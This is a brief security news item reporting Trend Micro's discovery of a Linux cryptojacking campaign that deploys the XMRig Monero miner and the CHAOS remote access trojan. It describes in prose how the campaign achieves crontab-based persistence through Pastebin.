Select Page

A cryptocurrency mining attack targeting the Linux operating system also involved the use of an open source remote access trojan (RAT) dubbed CHAOS.

The threat, which was spotted by Trend Micro in November 2022, remains virtually unchanged in all other aspects, including when it comes to terminating competing malware, security software, and deploying the Monero (XMR) cryptocurrency miner.

“The malware achieves its persistence by altering /etc/crontab file, a UNIX task scheduler that, in this case, downloads itself every 10 minutes from Pastebin,” researchers David Fiser and Alfredo Oliveira said.

This step is succeeded by downloading next-stage payloads that consist of the XMRig miner and the Go-based CHAOS RAT.

images from Hacker News